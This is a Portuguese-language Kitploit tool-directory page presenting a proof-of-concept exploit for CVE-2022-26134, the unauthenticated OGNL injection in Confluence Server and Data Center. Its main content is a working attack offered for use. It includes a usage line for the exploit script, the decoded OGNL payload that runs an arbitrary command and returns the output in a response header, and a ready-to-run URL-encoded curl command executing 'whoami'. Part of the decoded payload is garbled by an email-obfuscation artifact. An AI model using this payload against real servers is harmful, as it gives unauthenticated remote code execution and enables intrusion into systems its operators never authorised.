Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26134 — CVE-2022-26134 Confluence Injeção OGNL POC | Kitploit
Ferramentas/GitHubGitHub/alcaparra/cve-2022-26134
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubalcaparra/cve-2022-26134

CVE-2022-26134

CVE-2022-26134 Confluence Injeção OGNL POC

Ver Repositório
42há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26134 POC

Descrição

root@kitploit:~
Em versões afetadas do Confluence Server e Data Center, 
existe uma vulnerabilidade de injeção OGNL que permitiria que um atacante não autenticado executasse código arbitrário 
em uma instância do Confluence Server ou Data Center.

POC

  1. Execute python3 confluence.py -u http://127.0.0.1 -c whoami
  2. Lucro

O Payload

Payload com URL decodificada:

root@kitploit:~
/${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/

Isso executa o comando no servidor de destino e envia a saída de volta no cabeçalho X-Cmd-Response.

Você também pode usar curl:

root@kitploit:~
curl -kI "http://127.0.0.1/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"

Referências

  • https://www.cvedetails.com/cve/CVE-2022-26134 (não avaliado)
  • https://jira.atlassian.com/browse/CONFSERVER-79016
  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
Baixar ferramenta